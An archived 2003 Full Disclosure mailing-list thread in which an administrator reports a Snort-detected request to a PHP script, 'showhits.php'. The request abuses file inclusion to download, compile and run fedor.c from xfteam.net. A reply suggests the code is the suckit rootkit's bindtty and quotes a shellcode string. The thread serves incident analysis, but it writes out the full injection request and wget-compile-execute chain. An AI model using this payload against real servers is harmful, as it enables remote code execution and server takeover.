Full Disclosure mailing list archives

Previous By Date Next
Previous By Thread Next

Re: http://xfteam.net/fedor.c - Anyone seen this before??

From: gml <gml () phrick net>
Date: Mon, 24 Nov 2003 05:36:19 -0500
actually the closer i look at c4 i think it might just be sd's bindtty.c which is part of suckit. 

char sig[]="\x31\xdb\x31\xc0\x31\xd2\xb2\x08\x68\x67\x6d\x6c\x0a\x89\xe1\xb0\x04\xcd\x80\xb0\x01\xcd\x80";



Dan wrote:


Hi,
Our Snort picked up an interesting attempt to download, compile and execute.
Noting also the fact that the sub dir its attempting to access has not been
there for over 4 months(/logjam/)?

Has anyone actually seen what this fedor.c is? I have done some google'ing but
it comes up blank.

Has anyone else noticed this kindof request recently?

Is it just me or is xfteam.net not resolving anyway?

Orignal HTTP request:
GET /logjam/showhits.php?
rel_path=http://xfteam.net/cmd.txt?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f?&cmd=uname%20-a;cd%20/tmp;wget%20http://xfteam.net/fedor.c;gcc%20-o%20f%20fedor.c;./f

Breaking this down we get(twice):
uname -a
cd /tmp
wget http://xfteam.net/fedor.c
gcc -o f fedor.c
./f


Regards,
Daniel.



_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html


_______________________________________________
Full-Disclosure - We believe in it.
Charter: http://lists.netsys.com/full-disclosure-charter.html
Previous By Date Next
Previous By Thread Next

Current thread: